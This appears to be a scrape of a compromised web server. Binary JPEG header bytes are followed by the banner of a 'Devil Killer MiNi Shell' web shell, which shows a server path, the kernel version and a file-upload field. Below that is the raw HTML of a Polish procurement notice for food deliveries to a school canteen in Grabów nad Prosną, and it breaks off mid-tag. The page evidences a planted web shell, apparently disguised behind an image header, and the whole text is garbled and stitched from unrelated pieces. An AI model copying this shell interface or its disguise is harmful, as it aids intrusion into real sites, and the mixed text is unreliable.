JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220209/0005150701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w Szkole <br/> Podstawowej im. UNICEF w Grabowie nad Prosną w 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODSTAWOWA IM. UNICEF W GRABOWIE NAD PROSNĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000261746</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szkolna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grabów nad Prosną</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-520</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sp_grabow.zamowienia@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sp.grabow.szkolnastrona.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Fundacja &#34;Instytut Społecznej Odpowiedzialności Organizacji&#34;</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">7393752389</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Moniuszki</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">10-275</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">biuro@doradztwo-przetargi.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.doradztwo-przetargi.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w Szkole <br/> Podstawowej im. UNICEF w Grabowie nad Prosną w 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-68ab3c3d-8989-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00051507</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00034353/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w Szkole Podstawowej im. UNICEF w Grabowie nad Prosną w 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu miniPortalu, który jest dostępny pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu<br/>dostępnego pod adresem https://epuap.gov.pl/wps/portal<br/>https://www.uzp.gov.pl/e-zamowienia2/miniportal<br/>https://miniportal.uzp.gov.pl/<br/>dokumenty na wezwanie: biuro@doradztwo-przetargi.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępny pod<br/>adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150MB.<br/>Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert i wniosków)<br/>1. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami<br/>w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji<br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza:<br/>„Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal.<br/>Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem ogłoszenia (BZP).<br/>2. Zamawiający dopuszcza również możliwość komunikowania się z Wykonawcami za pomocą poczty<br/>elektronicznej, na adres e-mail biuro@doradztwo-przetargi.pl<br/>Uwaga! e-mail: biuro@doradztwo-przetargi.pl pojemność jednej wiadomości na skrzynce - do 10 MB<br/>3. Formularz do komunikacji - Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie<br/>dokumentów lub oświadczeń składane są przez Wykonawcę jako załączniki. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgodny z wymaganiami określonymi w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawców (Dz. U. z 2020 r., poz. 2415 ze<br/>zmianami) oraz określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452).<br/>4. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>Forma i zasady składania dokumentów i oświadczeń w tym dotyczących podmiotowych środków<br/>dowodowych (za wyjątkiem oferty i oświadczeń o spełnieniu warunków udziału w postępowaniu i<br/>oświadczeń o braku podstaw wykluczenia z postępowania) .<br/>1. Dokumenty lub oświadczenia, wykonawca składa w oryginale lub kopii poświadczonej za zgodność z<br/>oryginałem w formie elektronicznej, w postaci elektronicznej opatrzonej elektronicznym podpisem<br/>kwalifikowanym lub podpisem zaufanym lub podpisem osobistym. Jeżeli oryginał dokumentu lub<br/>oświadczenia, o których mowa powyżej nie zostały sporządzone w postaci dokumentu elektronicznego,<br/>wykonawca może sporządzić i przekazać elektroniczną kopię posiadanego dokumentu lub<br/>oświadczenia. W przypadku przekazywania przez wykonawcę elektronicznej kopii dokumentu lub<br/>oświadczenia, opatrzenie jej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym przez wykonawcę jest równoznaczne z poświadczeniem elektronicznej kopii<br/>dokumentu lub oświadczenia za zgodność z oryginałem.<br/>Pozostałe informacje zawarto w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. W przypadku powzięcia informacji o niezgodnym z<br/>prawem przetwarzaniu w trakcie trwania postępowania czy realizacji umowy, Pani/Pana danych<br/>osobowych, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego w<br/>sprawach ochrony danych osobowych.<br/>2. Podanie przez Panią/Pana danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania<br/>danych osobowych stanowi przepis prawa Pani/Pan dane mogą być przetwarzane w sposób<br/>zautomatyzowany<br/>i nie będą profilowane.<br/>3. Ponadto:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Szkoła Podstawowa im. UNICEF;<br/>􀀀 w sprawach z zakresu ochrony danych osobowych może się Pan/Pani kontaktować z Inspektorem<br/>Ochrony Danych w Szkole Podstawowej im. UNICEF pod adresem e-mail: Anna Mądra,<br/>sp_grabow@op.pl;<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego: Dostawa artykułów<br/>żywnościowych na potrzeby stołówki szkolnej w Szkole Podstawowej im. UNICEF w Grabowie nad<br/>Prosną w 2022 r., Znak sprawy: SP.2730.1.2022 prowadzonym w trybie podstawowym bez negocjacji;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o ustawę Prawo zamówień publicznych, dalej „ustawa Pzp”;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane przez okres co najmniej 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą<br/>w/w przedział czasowy, okres przechowywania obejmuje ten termin;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego.<br/>W trakcie oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP.2730.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wymagania dotyczące jaj:<br/>􀀀 klasy A o normalnym kształcie, skorupka nie uszkodzona,<br/>􀀀 komora powietrzna o wysokości nieprzekraczającej 6mm, nieruchoma,<br/>􀀀 białko przejrzyste, gęste, bez ciał obcych,<br/>􀀀 żółtko słabo widoczne, kuliste, przy obracaniu jajem słabo ruchliwe, powracające do<br/>centralnego położenia, bez ciał obcych,<br/>􀀀 tarczka zarodka niewidoczna,<br/>􀀀 zapach swoisty, bez obcego zapachu,<br/>􀀀 jaja różnej wielkości,<br/>Trwałość - okres przydatności do spożycia deklarowany 14 dni od daty dostawy do magazynu<br/>odbiorcy.<br/>Pakowanie – pojemniki wytłoczki lub inne zapewniające higieniczną dostawę (materiał<br/>opakowaniowy dopuszczony do kontaktu z żywnością), zamkniętych pokrywą/wytłoczką.<br/>Opakowanie zbiorcze zabezpieczone folią oraz posiadające opis producenta.<br/>Oznakowanie opakowania powinno zawierać:<br/>􀀀 datę minimalnej trwałości, która nie powinna przekraczać 28 dni,<br/>􀀀 nazwę, adres i numer zakładu pakującego jaja,<br/>􀀀 liczbę jaj,<br/>􀀀 klasę jakościową,<br/>􀀀 metodę chowu kur np. jaja od kur utrzymywanych na ściółce,<br/>􀀀 klasę wagową.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 pobite, nadtłuczone jaja,<br/>􀀀 pojemniki wskazujące na wyciek białka/żółtka jaja,<br/>􀀀 zapach, konsystencja wskazująca na produkt stary, zepsuty,<br/>􀀀 obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność<br/>szkodników oraz ich pozostałości,<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Szczegółowy opis znajduje się w Załączniku nr 1 dla Części 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Sukcesywna dostawa różnych artykułów spożywczych<br/>Wymagania dotyczące gotowych artykułów spożywczych:<br/>􀀀 opakowanie nienaruszone, czyste, brak zawilgocenia,<br/>􀀀 produkt o właściwej dla niego konsystencji, brak wilgoci,<br/>􀀀 zapach swoisty, bez obcego zapachu.<br/>Trwałość - okres przydatności do spożycia min. 75% okresu deklarowanego przez producenta,<br/>liczony od daty dostawy do magazynu odbiorcy.<br/>Pakowanie – oryginalne dla produktu, zawierająca etykietę producenta.<br/>Oznakowanie opakowania powinno zawierać (odpowiednio do rodzaju produktu):<br/>􀀀 nazwy żywności,<br/>􀀀 wykazu składników,<br/>􀀀 wszelkich składników lub substancji powodujących alergie lub reakcje,<br/>􀀀 nietolerancji użytych przy wytworzeniu lub przygotowywaniu żywności i nadal obecnych w<br/>produkcie gotowym (nawet, jeżeli ich forma uległa zmianie),<br/>􀀀 ilości określonych składników,<br/>􀀀 ilości netto żywności,<br/>􀀀 daty minimalnej trwałości lub terminu przydatności do spożycia,<br/>􀀀 specjalnych warunków przechowywania lub warunków użycia,<br/>􀀀 instrukcji użycia,<br/>􀀀 danych identyfikujących podmiot odpowiedzialny za przekazywanie,<br/>􀀀 informacji na temat żywności,<br/>􀀀 informacji o wartości odżywczej.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 opakowania zniszczone, zawilgocone, brudne, wskazujące na ubytek produktu,<br/>􀀀 zapach, konsystencja wskazująca na produkt stary, zepsuty,<br/>􀀀 obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność<br/>szkodników oraz ich pozostałości,<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Szczegółowy opis znajduje się w Załączniku nr 1 dla Części 2. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: 